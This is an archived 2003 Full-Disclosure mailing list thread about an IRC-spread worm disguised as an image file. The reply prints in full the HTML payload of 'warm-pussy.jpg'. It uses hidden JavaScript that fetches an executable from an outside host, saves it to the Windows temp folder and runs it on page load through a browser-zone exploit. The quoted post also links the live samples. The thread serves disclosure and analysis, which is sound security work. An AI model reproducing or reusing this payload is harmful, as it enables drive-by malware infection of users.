Message-ID: <001601c3a954$4c3514c0$320a0a0a@falcon>
From: segfault at nycap.rr.com (segfault)
Subject: new worm - "warm-pussy.jpg".
You idiot. Just because a file is called warm-pussy.jpg doesn't mean that
the webserver it resides on isn't going to parse its actual content (which
is probably plaintext). Look again, I'm sure you'll be surprised.
Contents of warm-pussy.jpg:
<html>
<head>
</head>
<body onLoad="doit()">
<p>
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","http://vnm.musx.net/moep.exe",0);
x.Send();
s.Write(x.responseBody);
s.SaveToFile("C:\\windows\\temp\\browsercheck.exe",2);
</textarea>
<textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
" classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
" codebase=\"c:/windows/temp/browsercheck.exe\"></object>";
w=createPopup();
w.document.clear();
w.document.write(md);
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/'/g,"\\'");
line = line.replace(/"/g,"\\\"");
line = line.replace(/[/]/g,"%2f");
line = line.replace(/\r\n/,"");
line += ' ';
if (line != '') {
result += line;
}
}
return result;
}
function weiter() {
open(myURL,"_search");
}
function starten(thecode) {
mycode = preparecode(thecode);
myURL = "file:javascript:eval('" + mycode + "')";
open("http:///","_search");
setTimeout("weiter()", 500);
}
function doit() {
starten(document.all.code.value);
setTimeout("doit2()", 600);
}
function doit2() {
starten(document.all.code2.value);
}
</script>
</p>
<p> </p>
<p><br>
</p>
<p></p>
<p> <img src="nice_warm_pussy.jpg" width="640" height="480"><br>
</p>
<p><br>
</p>
</body>
</html>
----- Original Message -----
From: "Tom Russell" <kalleth@...dram.co.uk>
To: <full-disclosure@...ts.netsys.com>
Sent: Wednesday, November 12, 2003 1:34 PM
Subject: [Full-Disclosure] new worm - "warm-pussy.jpg".
> Manifests itself in an infected victim by saying over IRC (mIRC it seems):
>
> 1824.11| [inx-dj|eJ-Kevin] rofl, how cool, check this out :)) http://
> vnm.musx.net /warm-pussy.jpg <--- just great!
>
> (spaces added to guard against accidental infection)
> It is unknown at this time whether this is another variant of
> irc.trojan.fgt.
> The files used in this worm can be obtained at
> http://kalleth.2tone-dev.com/fd/warm-pussy.rar in unaltered form - be
> careful what you do with them.
>
> (i take no responsibility for accidental infection.)
>
> Regards,
> Tom Russell,
> 2tone:development (www.2tone-dev.com)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>